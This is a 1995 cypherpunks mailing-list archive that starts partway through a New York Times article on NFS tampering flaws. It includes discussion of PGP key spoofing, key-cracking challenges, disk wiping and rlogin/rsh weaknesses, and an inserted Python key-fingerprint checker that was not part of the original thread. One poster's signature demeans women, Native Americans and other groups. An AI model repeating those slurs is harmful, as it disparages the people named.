>   that consumers routinely make their credit card numbers
>   available in transactions done by mail or telephone and
>   that the law puts limits on a consumer's liability in cases
>   of credit card fraud.
>
>   But Mr. Brewer, the Berkeley professor, said that the
>   crucial difference in the proposed Internet commerce
>   systems was that for the first time it would be relatively
>   simple for a criminal to collect hundreds or thousands of
>   credit card numbers. Then a thief could use each credit
>   card only one time, making detection much more difficult.
>
>   Sensitive to heightened concerns about security, Wells
>   Fargo, the large California bank, which earlier this year
>   began permitting customers with personal computers to view
>   their account information with the Netscape software,
>   suspended the service in September after the Berkeley
>   students reported the flaw in Netscape.
>
>   After Netscape followed with an improved version of its
>   software, Wells Fargo officials found it secure enough that
>   they planned to resume the service later this week. The
>   bank will, however, require customers to use the corrected
>   version of the Netscape program.
>
>   Even then, Wells Fargo customers will be able only to view
>   account balances and other information, but not transfer
>   money or conduct other transactions of the type that might
>   leave them vulnerable to the Internet NFS weakness.
>
>   "We still hope to be able to offer transactional
>   capabilities next year, but this has slowed us down a
>   little bit," said Lorna Doubet, a Wells Fargo spokeswoman.
>   "Many of our customers feel that security is absolutely
>   essential and we have to be cautious in this regard."
>
>   Executives at Netscape said yesterday that they were aware
>   of the security issues surrounding NFS and would make
>   changes in the next release of their software expected
>   before the end of the year to permit a recipient of a
>   downloaded program to check it for signs of tampering.
>
>   And hoping to take advantage of the fault-finding talents
>   of the Berkeley researchers and other like-minded software
>   experts, the company announced a contest today called
>   Netscape Bugs Bounty, in which Netscape will award prizes
>   to users who find bugs or security loopholes in its
>   software.
>
>   Some Internet experts said they expected that many security
>   weaknesses like the one the Berkeley group had demonstrated
>   would be found, because the Internet was simply not
>   designed to insure secure commerce.
>
>   "Imagine a walled town or a house," said Noel Chiappa, a
>   member of the Internet Engineering Task Force, a
>   standards-setting group. "It doesn't matter if 99 windows
>   are tight as can be -- if the 100th is wide open, the bad
>   guys will bypass your security."
>
>   [End]
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 11 Oct 95 07:44:35 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Man in the Middle Revisited (but not for the last time)
Message-ID: <199510111443.KAA04261@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:38 AM 10/11/95 -0700, Timothy C. May wrote:

>Nope. au contraire, negatory. I *do not* care if the entity calling itself
>"Hal Finney" is being surrounded by an MITM. Only "Hal Finney the Key" can
>read messages I encrypt to the public key I got from him long ago, so if
>the "Hal + MITM" can do so, they are effectively one and the same.

Not a new problem BTW as in the old joke:  "The Iliad wasn't written by
Homer but by another guy of the same name."

For the non-classically inclined, this is a joke because we don't really
know anything about Homer anyway.  Maybe he was a blind poet.  Maybe he
never existed.

DCF

"Who wonders why his local B&N StuporStore has 1/2 of one section of one
shelf unit dedicated to classics and shelf unit upon shelf unit dedicated to
the gender-disabled, to women, to native americans, to new age mysticism,
and other garbage.  Particularly since those interest areas represent the
losers.  Who's interested in losers?  (We know they're losers BTW because
we're *reading* about them in a capitalist store.  If they'd won there'd be
no reading and no store."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 11 Oct 95 10:37:27 PDT
To: cypherpunks@toad.com
Subject: "Denial of Clueless Service" Attacks
Message-ID: <aca14dba17021004a0b6@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:18 PM 10/11/95, Anonymous wrote:
>> Two years ago, I pointed out that getting a single message past
>> the man in the middle isn't good enough; you have to convince your
>> readers that the key they received on one channel is more accurate
>> than the key they're receiving on all the other channels.
>> But if they'll believe that, they may also believe the man in the middle's
>> announcement that the key in your name on all the keyservers is
>> wrong, and the correct key is the one he's putting out.
>> Can't win either way, but it's still important to get the key out.
>>
>> My current key is 0x54696D4D; the fingerprint is
>> 4D 65 44 75 53 61 21 2F   41 73 55 64 85 6D 21 7F.
>
>but this is not Tim May's key, his key is:
>
>pub  1024/54E7483F 1992/11/20 Timothy C. May <tcmay@netcom.com> 11-20-92
>          Key fingerprint =  8C 79 1C 1B 6F 32 A1 D1  65 FB 5F 57 50 6D D3 28
>
>
>And this one is signed by these people:
>
>pub  1024/54E7483F 1992/11/20 Timothy C. May <tcmay@netcom.com> 11-20-92
>sig       0022E52D             Eric Hughes <hughes@soda.berkeley.edu>
>sig       DDBE0DD5             John T. Draper <crunch@netcom.com>
....

Indeed, this is not an effective MITM attack. The spoofer certainly cannot
read messages encrypted to my public key (though he can read messages
encrypted to the public key offered above in his message...not a new
situation). And he cannot sign messages that others can match to the keys I
gave them, or that got put into the web of trust.

So, what is it? Is it a "denial of service" attack? Not really.

It's a "denial of clueless service" attack, in that anyone who tries to use
that key and then send me stuff gets to have their stuff _thrown away_,
which is always helpful in the war against cluelessness. Good riddance.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."
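
The check a recipient can run against the key announcement quoted in the message above, as an added example that is not part of the original post: it parses the PGP 2.x-style key listing quoted there into a pinned keyring and classifies an announced key ID and fingerprint against it. The function names and verdict strings are assumptions made for this illustration.

```python
import re

# The key listing quoted in the message above, copied as it appears there
# (the "pub" line is repeated, once with the fingerprint, once with signatures).
PINNED_LISTING = """\
pub  1024/54E7483F 1992/11/20 Timothy C. May <tcmay@netcom.com> 11-20-92
          Key fingerprint =  8C 79 1C 1B 6F 32 A1 D1  65 FB 5F 57 50 6D D3 28
pub  1024/54E7483F 1992/11/20 Timothy C. May <tcmay@netcom.com> 11-20-92
sig       0022E52D             Eric Hughes <hughes@soda.berkeley.edu>
sig       DDBE0DD5             John T. Draper <crunch@netcom.com>
"""

PUB_RE = re.compile(r"pub\s+(\d+)/([0-9A-Fa-f]{8})\s+\d{4}/\d{2}/\d{2}\s+(.+)$")
FPR_RE = re.compile(r"Key fingerprint\s*=\s*([0-9A-Fa-f\s]+)$")
SIG_RE = re.compile(r"sig\s+([0-9A-Fa-f]{8})\s+(.+)$")


def normalize_key_id(text):
    """Accept '0x54696D4D' or '54696d4d'; return 8 upper-case hex digits."""
    key_id = text.strip().upper()
    if key_id.startswith("0X"):
        key_id = key_id[2:]
    if not re.fullmatch(r"[0-9A-F]{8}", key_id):
        raise ValueError("key ID must be 8 hex digits: %r" % text)
    return key_id


def normalize_fingerprint(text):
    """Strip spacing from a 16-byte fingerprint; return 32 hex digits."""
    hexdigits = re.sub(r"\s+", "", text).upper()
    if not re.fullmatch(r"[0-9A-F]{32}", hexdigits):
        raise ValueError("fingerprint must be 16 bytes of hex: %r" % text)
    return hexdigits


def parse_listing(listing):
    """Parse a key listing into {key_id: {bits, user_id, fingerprint, signers}}."""
    keys = {}
    current = None
    for raw in listing.splitlines():
        line = raw.strip()
        pub = PUB_RE.match(line)
        if pub:
            key_id = normalize_key_id(pub.group(2))
            # A repeated "pub" line for the same key extends the same entry.
            current = keys.setdefault(key_id, {
                "bits": int(pub.group(1)),
                "user_id": pub.group(3),
                "fingerprint": None,
                "signers": [],
            })
            continue
        if current is None:
            continue  # ignore anything before the first "pub" line
        fpr = FPR_RE.match(line)
        if fpr:
            current["fingerprint"] = normalize_fingerprint(fpr.group(1))
            continue
        sig = SIG_RE.match(line)
        if sig:
            current["signers"].append(normalize_key_id(sig.group(1)))
    return keys


def check_claim(pinned, claimed_key_id, claimed_fingerprint):
    """Classify an announced key against the pinned keyring.

    Returns 'match', 'fingerprint-mismatch' (same key ID, different key)
    or 'unknown-key' (never pinned, whatever name is attached to it).
    """
    key_id = normalize_key_id(claimed_key_id)
    fingerprint = normalize_fingerprint(claimed_fingerprint)
    entry = pinned.get(key_id)
    if entry is None or entry["fingerprint"] is None:
        return "unknown-key"
    if entry["fingerprint"] != fingerprint:
        return "fingerprint-mismatch"
    return "match"


PINNED = parse_listing(PINNED_LISTING)

# The key ID and fingerprint announced in the quoted message.
ANNOUNCED_ID = "0x54696D4D"
ANNOUNCED_FPR = "4D 65 44 75 53 61 21 2F   41 73 55 64 85 6D 21 7F"

if __name__ == "__main__":
    print(check_claim(PINNED, ANNOUNCED_ID, ANNOUNCED_FPR))
```
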






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Berger <dvberger@eit.COM>
Date: Wed, 11 Oct 95 11:05:04 PDT
To: John Young <jya@pipeline.com>
Subject: Re: NYT on Internet Flaws
Message-ID: <199510111812.LAA21331@viper.eit.com>
MIME-Version: 1.0
Content-Type: text/plain


Just read through the stack of news this was based on (comp.security.unix)

The Berkeley folks rightly point out that if I trust an NFS to send me a
binary, then an interaction with the server sans authentication/encryption
can leave me with a compromised binary.  This is valid when I get my binary
from out on the net.  This seems much less valid when I live behind a
firewall and trust my fellow workers who have access to the server, the
wires coming out of my cube, and my whole machine for that matter.

As a result, the only thing I think this article should say is that we need
secure ftp.  Isn't this being worked on?

As for the article - 9/10 scaring people, 1/10 semi-fact.  Be serious?  NFS
is not the basic structure of the Internet.  I'm embarrassed that an article
so weak in its explanations and so high on fluff appeared on the front page
of a well respected newspaper.

Dave

-----the article for reread-------

>   The New York Times, October 11, 1995, pp. A1, D3.
>
>   [Page One]
>
>   Discovery of Internet Flaws Is Setback for On-Line Trade
>
>   By John Markoff
>
>
>   San Francisco, Oct. 10 -- Newly publicized weaknesses in
>   the basic structure of the Internet indicate that the
>   worldwide computer network may need a time-consuming
>   redesign before it can be safely used as a commercial
>   medium.
>
>   The flaws could allow an eavesdropper or criminal to divert
>   many types of documents or software programs traveling over
>   the Internet, examine or copy or alter them, and then pass
>   them on to the intended recipient -- who would have no easy
>   way of knowing that the files had been waylaid. Not only
>   could electronic mail be read in transit or credit card
>   numbers be copied en route, but special security techniques
>   meant to protect such transactions could be dismantled
>   without the user's knowledge.
>
>   That such security flaws exist is not surprising in a
>   system designed originally as a scientific experiment. But
>   the recent rush to the Internet by companies seeking to
>   exploit its commercial possibilities has obscured the fact
>   that giving the system a new purpose has unearthed
>   fundamental problems that could well put off true
>   commercial viability for years.
>
>   "Companies would have you believe this is a trivial
>   problem," said Eric Brewer, a professor of computer science
>   at the University of California at Berkeley. "But now there
>   is a financial incentive to exploit these flaws and to do
>   it secretly."
>
>   The problems were described in a posting that researchers
>   at the university made on Monday to several on-line
>   discussion groups. While the discussion groups are intended
>   for computer security experts, they are potentially
>   accessible to millions of Internet users -- including
>   break-in artists, who are known to monitor such discussion
>   groups for tips on new ways to crack computer systems.
>
>   The researchers who described the Internet weaknesses
>   include two Berkeley computer science graduate students who
>   noted a security weakness in a popular Netscape
>   Communications Corporation software program last month.
>   Then as now, the students' stated motivation in publicizing
>   the problems was to underscore vulnerabilities facing all
>   companies and customers wishing to use the Internet for
>   commerce.
>
>   When the Netscape problems were disclosed last month, the
>   company said the security flaws would be corrected in the
>   next version of its software, which users would be able to
>   download at no charge from Netscape's Internet site. But
>   the newly publicized flaws in the Internet itself indicate
>   that even if a user downloaded a copy of the new, improved
>   Netscape program, a criminal could tamper with the copy
>   along the way and make it unsafe for use in credit card
>   transactions.
>
>   The problem is not Netscape's alone; it potentially affects
>   any organization that operates a computer from which files
>   or software could be downloaded over the Internet. The
>   weakness can be traced to the technical underpinnings of
>   the network, which was set up more than a quarter-century
>   ago not as a medium for conducting business but as a way
>   for academic and scientific researchers to exchange
>   information.
>
>   The disclosure of the flaws casts doubt on the aspirations
>   of companies like Netscape, which last summer had one of
>   the most successful stock offerings in Wall Street history
>   based on the promise of the impending arrival of a
>   full-fledged on-line marketplace.
>
>   "Companies should take a step back and think about this a
>   little more," said Ian Goldberg, one of the Berkeley
>   students. "If it takes a bit longer but comes out more
>   secure, we will all be better off in the long run."
>
>   The way many Internet systems are set up -- especially the
>   Internet's increasingly popular World Wide Web service in
>   which software images and even video and audio clips can be
>   easily downloaded -- information is stored on a computer
>   called a file server and then transferred to a user's
>   computer when it is needed.
>
>   The newly publicized weakness occurs in a widely used
>   Internet protocol -- or technical standard -- known as the
>   Network File System, or NFS. Because NFS does not have any
>   means for allowing the recipient of a program or document
>   to verify that it has not been altered during transmission
>   from the file server to the user, any interception or
>   tampering would go undetected.
>
>   "The Internet protocols have been insecure since day one,"
>   said Jeffrey I. Schiller, the manager of computer networks
>   at the Massachusetts Institute of Technology and director
>   of an industry task force that is trying to design a new
>   secure version of the Internet.
>
>   But the group's timetable is uncertain, and even when it
>   does have recommendations ready, Mr. Schiller is not
>   optimistic that the industry will be willing to devote the
>   time and money to put them into effect.
>
>   He said that many technologies already exist for improving
>   commercial security on the Internet, but many of them
>   require too much technical sophistication on the part of
>   computer users. He criticized makers of hardware and
>   software for not moving more quickly to make easy-to-use
>   security features a built-in part of the technology used on
>   the Internet.
>
>   "The people who should be the leaders in offering security
>   have been too busy counting their money to build these
>   features in to their products," Mr. Schiller said.
>
>   Some commercial Internet merchants have tended to play down
>   the potential for harm from an illegal interception of
>   credit card information over the Internet. They point out
>   that consumers routinely make their credit card numbers
>   available in transactions done by mail or telephone and
>   that the law puts limits on a consumer's liability in cases
>   of credit card fraud.
>
>   But Mr. Brewer, the Berkeley professor, said that the
>   crucial difference in the proposed Internet commerce
>   systems was that for the first time it would be relatively
>   simple for a criminal to collect hundreds or thousands of
>   credit card numbers. Then a thief could use each credit
>   card only one time, making detection much more difficult.
>
>   Sensitive to heightened concerns about security, Wells
>   Fargo, the large California bank, which earlier this year
>   began permitting customers with personal computers to view
>   their account information with the Netscape software,
>   suspended the service in September after the Berkeley
>   students reported the flaw in Netscape.
>
>   After Netscape followed with an improved version of its
>   software, Wells Fargo officials found it secure enough that
>   they planned to resume the service later this week. The
>   bank will, however, require customers to use the corrected
>   version of the Netscape program.
>
>   Even then, Wells Fargo customers will be able only to view
>   account balances and other information, but not transfer
>   money or conduct other transactions of the type that might
>   leave them vulnerable to the Internet NFS weakness.
>
>   "We still hope to be able to offer transactional
>   capabilities next year, but this has slowed us down a
>   little bit," said Lorna Doubet, a Wells Fargo spokeswoman.
>   "Many of our customers feel that security is absolutely
>   essential and we have to be cautious in this regard."
>
>   Executives at Netscape said yesterday that they were aware
>   of the security issues surrounding NFS and would make
>   changes in the next release of their software expected
>   before the end of the year to permit a recipient of a
>   downloaded program to check it for signs of tampering.
>
>   And hoping to take advantage of the fault-finding talents
>   of the Berkeley researchers and other like-minded software
>   experts, the company announced a contest today called
>   Netscape Bugs Bounty, in which Netscape will award prizes
>   to users who find bugs or security loopholes in its
>   software.
>
>   Some Internet experts said they expected that many security
>   weaknesses like the one the Berkeley group had demonstrated
>   would be found, because the Internet was simply not
>   designed to insure secure commerce.
>
>   "Imagine a walled town or a house," said Noel Chiappa, a
>   member of the Internet Engineering Task Force, a
>   standards-setting group. "It doesn't matter if 99 windows
>   are tight as can be -- if the 100th is wide open, the bad
>   guys will bypass your security."
>
>   [End]
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Wed, 11 Oct 95 08:21:08 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Man in the Middle Revisited (but not for the last time)
In-Reply-To: <199510111443.KAA04261@panix.com>
Message-ID: <199510111520.LAA15537@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Duncan Frissell writes:
> DCF
> 
> "Who wonders why his local B&N StuporStore has 1/2 of one section of one
> shelf unit dedicated to classics and shelf unit upon shelf unit dedicated to
> the gender-disabled, to women, to native americans, to new age mysticism,
> and other garbage.  Particularly since those interest areas represent the
> losers.  Who's interested in losers?  (We know they're losers BTW because
> we're *reading* about them in a capitalist store.  If they'd won there'd be
> no reading and no store."

This signature was:
	* completely off-topic by any stretch of the imagination
	* longer than the rest of the message
	* flamebait

Detweiler's rants are at least usually vaguely relevant to crypto & privacy.

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Tue, 10 Oct 95 18:38:29 PDT
To: shamrock@netcom.com (Lucky Green)
Subject: Re: PC disk wipe software
In-Reply-To: <199510092220.SAA19341@book.hks.net>
Message-ID: <199510110137.LAA11056@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello cypherpunks@toad.com
  and shamrock@netcom.com (Lucky Green)

> In article <199510091318.JAA24166@jekyll.piermont.com>, perry@piermont.com
> ("Perry E. Metzger") wrote:
 
[asking for utility to wipe data from MS-DOS hard drive]
 
shamrock@netcom.com (Lucky Green) answered:

...
> They all invariably fail to wipe the slackspace at the end of
> allocated, but not fully used blocks. Consequently, several kB of data
...

Since nobody seemed to mention it: I suspect that most of them also
fail to wipe already reallocated space.

Think about it: some of that space was only overwritten once...

So to be safe I guess make a backup (with a backup utility that doesn't
copy slackspace), wipe the disk, then restore. Also beware programs that
do not properly zero their files when allocating them.

The cliche answer to the original question, I believe, is:
  yes, go to the hardware store and ask for a 'sledgehammer'.


Hope that makes sense...

Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMHsf0SxV6mvvBgf5AQGMmgP9GJvJgWmdW3YHRCfNRKQtlM557MIrzn+t
ZDbiSp/E7hKXPDf7Ech/O7hzdFvCCA7APR4lE9bIimP8mFuE5KAKTLIC2cYnG6Hi
Cj28OorVS/mDtwMOJJ6TJLV8tXArDtvAKY9OOghzepZs9hf9b5lXs6PXWEd7gb6F
LinHs36C4dI=
=0vcL
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Wed, 11 Oct 95 11:48:11 PDT
To: cypherpunks@toad.com
Subject: On export restrictions and the NYT/Internet Commerece
Message-ID: <199510111842.LAA14299@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	The recent NYT article about the NFS work (nominally about the
NFS work, I wouldn't call "spoofing NFS" to be tantamount to being
able to spoof any file xfer over the internet) stresses that the
internet wasn't built for security, yadda yadda yadda and therefore
isn't very useful for internet commerce at this point.

	I urge everyone who talks to the media about this to stress
export restrictions. The infrastructure *would* be in place by now if
we didn't have export restrictions. Deployed encryption at the IP
level would be much easier if we didn't have export restrictions,
etc. etc.

	Now that the potential for big bucks is obviously on the line
maybe (they always were on the line, it is just more obvious
now), just maybe, enough large corporations will invest in lobbying for
the removal of export restrictions that it will get done.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chris Claborne <Chris.Claborne@SanDiegoCA.ATTGIS.com>
Date: Wed, 11 Oct 95 11:54:03 PDT
To: John Gilmore <cypherpunks@toad.com
Subject: Re: SAIC bought InterNic, but who is SAIC?  A spook contractor!
Message-ID: <199510111853.OAA26654@ncrhub5.attgis.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:18 PM 9/28/95 -0700, John Gilmore wrote:
>Forwarded-by: gordoni@base.com (Gordon Irlam)

>SAIC's board members include Admiral Bobby Inman, former NSA head and deputy
>director of the CIA; Melvin Laird, Nixon's defense secretary; and retired
>General Max Thurman, commander of the Panama Invasion. Recently departed
>board members include Robert Gates, former CIA director; William Perry,
>current Secretary of Defense; and John Deutch, the current CIA director.
>Current SAIC government contracts include re-engineering information systems
>at the Pentagon, automation of the FBI's computerized fingerprint
>identification system, and building a national criminal history information
>system.

   I am not supporting the idea that SAIC is not another govt mouthpiece or
cover op but it is standard practice to hire retired workers from government
that worked in the area that you want to sell services into.

   I know of an ex-army colonel that used to work for a government
contractor.  I'm sure that he used his contacts to sell services to the
government.  You gotta love it!

Don't trust S/MIME, it's supported by RSA (a govt mouthpiece) and uses DES.

                                        ...  __o
                                       ..   -\<,
Chris.Claborne@SanDiegoCA.ATTGIS.Com   ...(*)/(*).          CI$: 76340.2422
http://bordeaux.sandiegoca.attgis.com/
PGP Pub Key fingerprint =  A8 FA 55 92 23 20 72 69  52 AB 64 CC C7 D9 4F CA
Avail on Pub Key server.
PGP-encrypted e-mail welcome!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kari Laine <buster@klaine.pp.fi>
Date: Wed, 11 Oct 95 01:56:16 PDT
To: cypherpunks@toad.com
Subject: Re: Elementrix POTP
In-Reply-To: <199510102120.RAA110954@tequesta.gate.net>
Message-ID: <MAPI.Id.0016.00617269204c61693835434230303437@MAPI.to.RFC822>
MIME-Version: 1.0
Content-Type: text/plain


> Unfortunately, and we really mean unfortunately, we can only reveal what 
>"it is" to people who agree to a non-disclosure arrangement while we're 
>patent pending. Otherwise we would have no problem revealing the whole 
>method. So far, every international expert who has reviewed the method 
>agrees (after many, many hours and days of trying to find holes) that POTP 
>really does what we say it does.

Maybe you could name those experts who have inspected it - thanks.


Kari




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Wed, 11 Oct 95 08:59:53 PDT
To: John Lull <lull@acm.org>
Subject: Re: java security concerns
In-Reply-To: <199510101714.KAA07329@ix2.ix.netcom.com>
Message-ID: <Pine.SUN.3.91.951011115859.16896C-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 10 Oct 1995, John Lull wrote:

> Pardon my French, but if your lawyers make it impossible to do
> technical work correctly, isn't it time to get new lawyers?  I can't
> see how offering a reward for reporting bugs could possibly be
> objectionable to any rational lawyer.

I agree; I sent private mail to the parties saying in effect "if your 
lawyer can't structure this, it's time to get a new lawyer."

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | New address, but it's still just as hot here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: todd@lgt.com (Todd Glassey)
Date: Wed, 11 Oct 95 12:08:00 PDT
To: pjb@ny.ubs.com (Paul J. Bell)
Subject: Re: Basic Flaws in Internet Security and Commerce
Message-ID: <v02110103aca1c480b5a8@[204.156.156.4]>
MIME-Version: 1.0
Content-Type: text/plain


>A fine piece of work.  The ideas expressed in this paper should scare
>the hell out of everyone who uses NFS for any serious applications,
>which for a fact includes most banks and all investment banks and
>brokerage houses.  In this particular area I KNOW what is at risk.
>Again, I congratulate the authors on a first-class effort.
>
>

The real issue is not NFS itself but RPC and the interface layer between
the system and these layered services. In fact holes also exist in RLOGIN,
REXEC, and RSH (ports 512, 513, and 514).

Can't tell you how many secure systems we have broken because of these
little goodies.

The real issue is that by itself TCP/IP has no security to speak of, and
more importantly the concept of secure messaging goes much farther than
just keeping prying eyes off the data contained within. For instance
Commerce Models require synchronization of process events in order to manage
OLTP properly. TCP/IP in and of itself is really unusable for these tasks
without something like the ISIS messaging protocol and process control
interface above the protocol stack.

All in all it's a complex nut to crack.

Todd

cheers,
>    paul
>
>> From owner-cypherpunks@toad.com Tue Oct 10 03:15:15 1995
>> From: gauthier@espresso.CS.Berkeley.EDU (Paul_A Gauthier)
>> To: cypherpunks@toad.com, bugtraq@crimelab.com
>> Cc: gauthier@cs.Berkeley.EDU, brewer@cs.Berkeley.EDU, iang@cs.Berkeley.EDU,
>>         daw@cs.Berkeley.EDU, fur@netscape.com
>> Subject: Basic Flaws in Internet Security and Commerce
>> Date: Mon, 09 Oct 1995 14:26:06 -0700
>> Sender: owner-cypherpunks@toad.com
>> Content-Length: 10235
>>

Regards,

T. S. Glassey
Chief Technologist
Looking Glass Technologies
todd@lgt.com


-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQB1AwUBMFu5E6gNRnWhagU5AQHI+gL+Mwpcd3lAWd8FF06qcG6rnLhIYveHW71a
XC7xh1T0uu8qnYX31yMp17OG28jWpKUbWec1IM9/eXOi+gInA7rKICWczV8zo9Z0
0puxjRRN7yO4KfRb3cPpk+r0p6pDg01Y
=bTYb
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 11 Oct 95 05:04:05 PDT
To: cypherpunks@toad.com
Subject: Open Mkt Sudden Infant Death
Message-ID: <199510111203.NAA20811@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



Open Market Web Site Launches Free "Internet Security" 


Cambridge, MA, Oct 10  -- In a teleconference, Open
Market launched a three-pronged attack on Internet
"security breaches" that includes an online "security
checker" for multivendor Web browsers belonging to end
users, free upgrades from the Netscape Secure Server to
the Open Market's Secure WebServer, and the giveaway of
sample code to operators of "any extensible secure Web
server."

The trio of security remedies will all be available free
of charge starting this week from the Open Market Web
site at <http://www.openmarket.com>, officials reported
during the teleconference.

"Our entire business is based on people having trust in
open networks," noted Shikhar Ghosh, Open Market's chief
executive officer (CEO). "We'll make a significant
investment, with the view that all of us will suffer if (the
public) loses trust."

Consumers are only "gradually gaining some confidence" in
the Internet, according to Ghosh. But recently, reports
have surfaced of security problems with the Netscape
Secure Server, and some Web sites using the Netscape
product have been "saying they are going to go off the
air."

As a result, he added, Open Market is introducing a
policy that allows licensed users of the Netscape Secure
Server to download Open Market's Secure WebServer "at no
cost."

The other two planks in Open Market's new pro-security
Web "resource center" are "informational," the
journalists and analysts were told. Open Market will work
with the makers of Web browsers to track information on
"known problems" with browsers, including browser
tampering. "We will (also) inform the (Web) software
companies of problems," the CEO maintained.

The Open Market Web site will perform a database look-up
on the type of browser in use, and will then report back
to the user on any security issues known to be associated
with that kind of browser, elaborated Open Market's Win
Treese.

"One strength we have is that we don't have a browser. We
are agnostic," Ghosh told the telephone audience. Open
Market also performs "extensive testing" on Web browsers.
"We do as many as several hundred versions of browsers
coming in at any time. We definitely expect (to) unite
the industry, rather than dividing the industry," he
added.

The sample code to be offered from the Open Market Web
site will provide "underlying code" for "reference
implementations on what are the major ways of handling
the known (Internet security) problems," according to
Ghosh.

"To reiterate, security is one of those pillars on which
the entire industry rests," contended the Open Market
chief, to conclude the teleconference.

Contact: Open Market, 617-621-9500; Press Contacts: Wendy
Ziner, Open Market, 617-374-6508; Dawn Geary or Merrill
Freund, Schwartz Communications for Open Market,
617-431-0770

-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: goldberg@mars.superlink.net
Date: Wed, 11 Oct 95 10:19:33 PDT
To: cypherpunks@toad.com
Subject: Re: Internet, the cracking machine
Message-ID: <199510111722.NAA16839@mars.superlink.net>
MIME-Version: 1.0
Content-Type: text/plain



Wei Dai writes:
>factor RSA keys of bit
>512: 20 minutes
>768: 50 days
>1024: 100 years
>2048: 1e11 years
>
>If you are reading this from an archive, divide the brute force numbers by
>4**(your current year-1995), and the factoring numbers by 8**(your current
>year-1995), for a factor of 2 improvement per year in each of the
>following: average CPU power, number of computers on the Internet, and
>factoring algorithm. 

BUT, one must remember that the power of 2 increase is going on during the
100 years effort to break the 1024 bit case, so, by these assumptions, the
1024 bit key will break sometime in the 6th year! 

Fred G.
Jon Goldberg





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Wed, 11 Oct 95 10:26:30 PDT
To: patrick@Verity.COM (Patrick Horgan)
Subject: Re: NYT on Internet Flaws
In-Reply-To: <9510111604.AA06660@cantina.verity.com>
Message-ID: <9510111723.AA17966@all.net>
MIME-Version: 1.0
Content-Type: text


> I'd love to see something in there about most commercial sites being behind
> firewalls without nfs access across the firewall.  This greatly reduces the
> risk from the nfs problems.  If you get your binary via nfs from a trusted
> host inaccessible from the internet, then if you have this problem management
> can handle it as an employee problem;)  There are ways to make secure
> firewalls, it's fairly well understood.  Sometimes people point to things
> like the hack Mitnick did last Christmas, but his attack took advantage of
> a couple of things a security expert shouldn't have allowed, first and
> foremost two machines were accessible from the internet, and one of them
> trusted root logins from the other without a password:(
> 
> I could write something up about it if you'd like.

You might want to refer the NYT to the recent study published by
Computer Security Institute (in info-sec super journal on our W3 site).

There are also several papers there on "Internet Holes" under Network
Security in the same on-line journal.  Every month, another 5-10 holes
are added to those published in this forum.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mlm@skyrr.is (Magnus Logi Magnusson)
Date: Wed, 11 Oct 95 06:46:05 PDT
To: frissell@panix.com (Duncan Frissell)
Subject: Re: Hal's Third Challenge?
In-Reply-To: <199510101920.PAA24628@panix.com>
Message-ID: <199510111345.AA046029137@hp001c.skyrr.is>
MIME-Version: 1.0
Content-Type: text


> My interest arises out of the new Pentium 120 that has come my way and the
> 40,000 keys/second it gets running the 32-bit version of the Brute code.
> Since my ISP is a local call, I might even be able to get away with an 8
> hour PPP session to try the WIN95 client.
> 
I'm interested too... if there is a 32 bit client for NT/Win95 (or a single
threaded one for Win32s) capable of reporting automatically to the
server/local server, I could probably throw in c.a. 40-50 pentiums and a
lot more 486 (and a few HP/Sun/Alpha) :-)  Anyone working on self-reporting
win32 client?

  Logi.

-- 
Magnus Logi Magnusson
System programmer, State and Municipal Data processing center, Iceland
